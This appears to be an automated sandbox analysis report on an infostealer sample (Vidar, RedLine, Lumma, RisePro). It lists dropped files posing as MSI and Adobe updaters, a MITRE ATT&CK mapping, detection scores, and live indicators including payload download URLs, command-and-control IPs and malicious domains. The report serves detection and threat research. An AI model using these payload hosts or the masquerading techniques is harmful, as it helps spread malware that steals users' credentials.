Source: Yara match	File source: Process Memory Space: MSIUpdaterV168.exe PID: 7744, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 46.0.MSIUpdaterV168.exe.f50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\AdobeUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\AdobeUpdaterV168.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\meta2806[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe, type: DROPPED

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FF01FE0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	24_2_1FF01FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FEFDFC0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_mprintf,sqlite3_bind_text,sqlite3_step,sqlite3_reset,	24_2_1FEFDFC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FE95C70 sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset,	24_2_1FE95C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FEFDB10 sqlite3_initialize,sqlite3_bind_int64,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,	24_2_1FEFDB10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FFAD9E0 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,	24_2_1FFAD9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FF25910 sqlite3_mprintf,sqlite3_bind_int64,	24_2_1FF25910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FF5D610 sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	24_2_1FF5D610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FF255B0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	24_2_1FF255B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FFAD4F0 sqlite3_bind_value,sqlite3_log,sqlite3_log,sqlite3_log,	24_2_1FFAD4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FFA14D0 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,	24_2_1FFA14D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FF3D3B0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	24_2_1FF3D3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FF251D0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	24_2_1FF251D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FF19090 sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_errmsg,sqlite3_mprintf,	24_2_1FF19090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FEB0FB0 sqlite3_result_int64,sqlite3_result_double,sqlite3_result_int,sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset,	24_2_1FEB0FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FF64D40 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,InitOnceBeginInitialize,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,	24_2_1FF64D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FE94820 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,sqlite3_initialize,	24_2_1FE94820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FED06E0 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,	24_2_1FED06E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FEA8680 sqlite3_mprintf,sqlite3_mprintf,sqlite3_initialize,sqlite3_finalize,sqlite3_free,sqlite3_mprintf,sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_int64,	24_2_1FEA8680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FED8550 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,	24_2_1FED8550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FEF8200 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,	24_2_1FEF8200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FF637E0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	24_2_1FF637E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FF43770 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	24_2_1FF43770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FEAB400 sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value,sqlite3_reset,sqlite3_step,sqlite3_reset,sqlite3_column_int64,	24_2_1FEAB400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FEDEF30 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,	24_2_1FEDEF30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FEFA6F0 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value,	24_2_1FEFA6F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FE966C0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_bind_value,sqlite3_free,sqlite3_bind_value,sqlite3_step,sqlite3_reset,	24_2_1FE966C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FEEE200 sqlite3_initialize,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,	24_2_1FEEE200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FEFE170 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	24_2_1FEFE170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 24_2_1FEEE090 sqlite3_bind_int64,sqlite3_bind_value,sqlite3_step,sqlite3_reset,	24_2_1FEEE090

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	12 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	12 Native API	1 Scheduled Task/Job	612 Process Injection	11 Deobfuscate/Decode Files or Information	11 Input Capture	1 Account Discovery	Remote Desktop Protocol	41 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	11 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	2 Obfuscated Files or Information	Security Account Manager	13 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	Login Hook	11 Registry Run Keys / Startup Folder	1 Software Packing	NTDS	47 System Information Discovery	Distributed Component Object Model	1 Email Collection	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 PowerShell	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	461 Security Software Discovery	SSH	11 Input Capture	124 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	241 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	241 Virtualization/Sandbox Evasion	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	612 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
zyJWi2vy29.exe	68%	ReversingLabs	Win32.Spyware.Vidar
zyJWi2vy29.exe	43%	Virustotal		Browse
zyJWi2vy29.exe	100%	Avira	HEUR/AGEN.1317026
zyJWi2vy29.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vidar2806[1].exe	100%	Avira	HEUR/AGEN.1317026
C:\Users\user\AppData\Local\AdobeUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\AdobeUpdaterV168.exe	100%	Avira	HEUR/AGEN.1317026
C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	100%	Avira	HEUR/AGEN.1317026
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\rise2806[1].exe	100%	Avira	HEUR/AGEN.1317026
C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	100%	Avira	HEUR/AGEN.1317026
C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\3f61nAONpe1PsLC0oJHy.exe	100%	Avira	HEUR/AGEN.1317026
C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	100%	Avira	HEUR/AGEN.1317026
C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	100%	Avira	HEUR/AGEN.1317026
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\lumma2806[1].exe	100%	Avira	HEUR/AGEN.1317026
C:\Users\user\AppData\Local\AdobeUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\AdobeUpdaterV168.exe	100%	Avira	HEUR/AGEN.1317026
C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	100%	Avira	HEUR/AGEN.1317026
C:\Users\user\AppData\Local\AdobeUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\AdobeUpdaterV168.exe	100%	Avira	HEUR/AGEN.1317026
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\meta2806[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vidar2806[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\AdobeUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\AdobeUpdaterV168.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\rise2806[1].exe	100%	Joe Sandbox ML
C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	100%	Joe Sandbox ML
C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\3f61nAONpe1PsLC0oJHy.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\AdobeUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\AdobeUpdaterV168.exe	100%	Joe Sandbox ML
C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	100%	Joe Sandbox ML
C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\lumma2806[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\AdobeUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\AdobeUpdaterV168.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\AdobeUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\AdobeUpdaterV168.exe	100%	Joe Sandbox ML
C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	68%	ReversingLabs	Win32.Spyware.Vidar
C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	68%	ReversingLabs	Win32.Trojan.Znyonm
C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	55%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	79%	ReversingLabs	Win32.Trojan.RedLine
C:\Users\user\AppData\Local\AdobeUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\AdobeUpdaterV168.exe	68%	ReversingLabs	Win32.Spyware.Vidar
C:\Users\user\AppData\Local\AdobeUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\AdobeUpdaterV168.exe	68%	ReversingLabs	Win32.Trojan.Znyonm
C:\Users\user\AppData\Local\AdobeUpdaterV168_b055341c05e33d6c2334ce6d41cea915\AdobeUpdaterV168.exe	55%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
C:\Users\user\AppData\Local\AdobeUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\AdobeUpdaterV168.exe	79%	ReversingLabs	Win32.Trojan.RedLine
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\rise2806[1].exe	68%	ReversingLabs	Win32.Spyware.Vidar
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\lumma2806[1].exe	68%	ReversingLabs	Win32.Trojan.Znyonm
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\meta2806[1].exe	55%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sqlt[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vidar2806[1].exe	79%	ReversingLabs	Win32.Trojan.RedLine
C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\3f61nAONpe1PsLC0oJHy.exe	68%	ReversingLabs	Win32.Trojan.Znyonm
C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	68%	ReversingLabs	Win32.Spyware.Vidar
C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	55%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	79%	ReversingLabs	Win32.Trojan.RedLine

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
potterryisiw.shop	2%	Virustotal	Browse
ipinfo.io	0%	Virustotal	Browse
t.me	0%	Virustotal	Browse
db-ip.com	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.fontbureau.com/designers	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
https://api.ip.sb/ip	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.fontbureau.com/designers/frere-user.html	0%	URL Reputation	safe
https://ipinfo.io/	0%	URL Reputation	safe
https://195.201.251.214:9000/sqlt.dll67	0%	Avira URL Cloud	safe
http://www.fontbureau.com/designersG	0%	URL Reputation	safe
http://www.fontbureau.com/designers/?	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://195.201.251.214:9000/nss3.dll	0%	Avira URL Cloud	safe
http://www.fontbureau.com/designers?	0%	URL Reputation	safe
http://crl.microsoft	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://www.fonts.com	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199707802586hellosqlt.dllsqlite3.dll	0%	Avira URL Cloud	safe
https://t.me/ON	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
https://db-ip.com/	0%	Avira URL Cloud	safe
http://crl.microsoft	0%	Virustotal		Browse
https://ipinfo.io/widget/demo/8.46.123.336&	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
https://195.201.251.214:9000/mozglue.dllge	0%	Avira URL Cloud	safe
https://db-ip.com/x;	0%	Avira URL Cloud	safe
https://steamcommunity.com/profiles/76561199707802586hellosqlt.dllsqlite3.dll	0%	Virustotal		Browse
http://77.105.132.27/meta2806.exeL	0%	Avira URL Cloud	safe
https://195.201.251.214:9000/nss3.dll	0%	Virustotal		Browse
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe	0%	Avira URL Cloud	safe
https://db-ip.com/	0%	Virustotal		Browse
https://195.201.251.214:9000/softokn3.dllgM	0%	Avira URL Cloud	safe
https://t.me/risepro_bot3320	0%	Avira URL Cloud	safe
https://discord.com/api/v9/users/	0%	Avira URL Cloud	safe
https://t.me/risepro_botisepro_bot	0%	Avira URL Cloud	safe
https://t.me/risepro_botv:#	0%	Avira URL Cloud	safe
https://discord.com/api/v9/users/	0%	Virustotal		Browse
contintnetksows.shop	100%	Avira URL Cloud	malware
https://potterryisiw.shop/	100%	Avira URL Cloud	malware
ellaboratepwsz.xyzu	0%	Avira URL Cloud	safe
https://195.201.251.214:9000/vcruntime140.dll.	0%	Avira URL Cloud	safe
contintnetksows.shop	2%	Virustotal		Browse
https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll	0%	Avira URL Cloud	safe
http://77.105.132.27/lumma2806.exeB	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://potterryisiw.shop/	0%	Virustotal		Browse
http://77.105.132.27/rise2806.exe	100%	Avira URL Cloud	malware
https://t.me/RiseProSUPPORT	0%	Avira URL Cloud	safe
https://potterryisiw.shop/apiB	100%	Avira URL Cloud	malware
https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll	0%	Virustotal		Browse
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Virustotal		Browse
https://t.me/risepro_botisepro_bot	0%	Virustotal		Browse
https://195.201.251.214:9000/vcruntime140.dllrv:129.0)	0%	Avira URL Cloud	safe
http://77.105.132.27/rise2806.exe	13%	Virustotal		Browse
https://195.201.251.214:9000/softokn3.dllo	0%	Avira URL Cloud	safe
swellfrrgwwos.xyz	100%	Avira URL Cloud	malware
https://195.201.251.214:9000/softokn3.dlle	0%	Avira URL Cloud	safe
https://195.201.251.214:9000/vcruntime140.dller	0%	Avira URL Cloud	safe
https://t.me/RiseProSUPPORT	0%	Virustotal		Browse
https://potterryisiw.shop/apip	100%	Avira URL Cloud	malware
https://195.201.251.214:9000/x$H	0%	Avira URL Cloud	safe
https://www.maxmind.com/en/locate-my-ip-address	0%	Avira URL Cloud	safe
https://db-ip.com/v	0%	Avira URL Cloud	safe
swellfrrgwwos.xyz	1%	Virustotal		Browse
foodypannyjsud.shop	100%	Avira URL Cloud	malware
https://195.201.251.214:9000/softokn3.dlle	0%	Virustotal		Browse
pedestriankodwu.xyz	100%	Avira URL Cloud	malware
https://195.201.251.214/	0%	Avira URL Cloud	safe
https://195.201.251.214:9000/Jb	0%	Avira URL Cloud	safe
https://195.201.251.214:9000	0%	Avira URL Cloud	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	0%	Avira URL Cloud	safe
http://ns.exif/1e.$A/	0%	Avira URL Cloud	safe
http://77.105.132.27/meta2806.exe/risep	100%	Avira URL Cloud	malware
https://195.201.251.214:9000170le	0%	Avira URL Cloud	safe
https://ipinfo.io:443/widget/demo/8.46.123.33	0%	Avira URL Cloud	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	0%	Avira URL Cloud	safe
https://195.201.251.214:9000/mozglue.dll	0%	Avira URL Cloud	safe
https://195.201.251.214:9000/softokn3.dlls5	0%	Avira URL Cloud	safe
https://195.201.251.214:9000/y	0%	Avira URL Cloud	safe
https://web.telegram.org	0%	Avira URL Cloud	safe
https://potterryisiw.shop/l	100%	Avira URL Cloud	malware
https://195.201.251.214:9000/	0%	Avira URL Cloud	safe
http://77.105.132.27/rise2806.exes	0%	Avira URL Cloud	safe
https://api.ip.s	0%	Avira URL Cloud	safe
https://ipinfo.io/widget/demo/8.46.123.332	0%	Avira URL Cloud	safe
https://195.201.251.214:9000/icrosoft	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
potterryisiw.shop	188.114.97.3	true	true	2%, Virustotal, Browse	unknown
ipinfo.io	34.117.186.192	true	false	0%, Virustotal, Browse	unknown
t.me	149.154.167.99	true	true	0%, Virustotal, Browse	unknown
db-ip.com	104.26.4.15	true	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
contintnetksows.shop	true	2%, Virustotal, Browse Avira URL Cloud: malware	unknown
ellaboratepwsz.xyzu	true	Avira URL Cloud: safe	unknown
http://77.105.132.27/rise2806.exe	true	13%, Virustotal, Browse Avira URL Cloud: malware	unknown
swellfrrgwwos.xyz	true	1%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://ipinfo.io/	false	URL Reputation: safe	unknown
foodypannyjsud.shop	true	Avira URL Cloud: malware	unknown
pedestriankodwu.xyz	true	Avira URL Cloud: malware	unknown
http://77.105.132.27/lumma2806.exe	true	Avira URL Cloud: malware	unknown
https://ipinfo.io/widget/demo/8.46.123.33	false	Avira URL Cloud: safe	unknown
towerxxuytwi.xyzd	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://195.201.251.214:9000/sqlt.dll67	RegAsm.exe, 00000018.00000002.2942958827.0000000001446000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	6JTEmGBjvBASWeb Data.3.dr, DE7o6D8KRQYZWeb Data.3.dr, hzBvBK8Qfe_SWeb Data.3.dr, CAAEBK.24.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	6JTEmGBjvBASWeb Data.3.dr, DE7o6D8KRQYZWeb Data.3.dr, hzBvBK8Qfe_SWeb Data.3.dr, CAAEBK.24.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://195.201.251.214:9000/nss3.dll	RegAsm.exe, 00000018.00000002.2939946030.0000000000445000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2942958827.0000000001446000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://crl.microsoft	RegAsm.exe, 00000026.00000002.2004278407.0000000001398000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199707802586hellosqlt.dllsqlite3.dll	8x9h3ctqkpfTu0sNF0X2.exe, 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmp, MSIUpdaterV168.exe, 00000022.00000002.2029351588.00000000004F4000.00000004.00000001.01000000.0000000A.sdmp, MSIUpdaterV168.exe, 00000024.00000002.1988085776.00000000004F4000.00000004.00000001.01000000.0000000A.sdmp, RegAsm.exe, 00000033.00000002.2939944495.0000000000425000.00000040.00000400.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://t.me/ON	RegAsm.exe, 00000018.00000002.2942958827.000000000135F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://db-ip.com/	RegAsm.exe, 00000014.00000002.1941155556.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.1941155556.0000000000DB4000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ipinfo.io/widget/demo/8.46.123.336&	RegAsm.exe, 00000003.00000002.1989820350.0000000001337000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
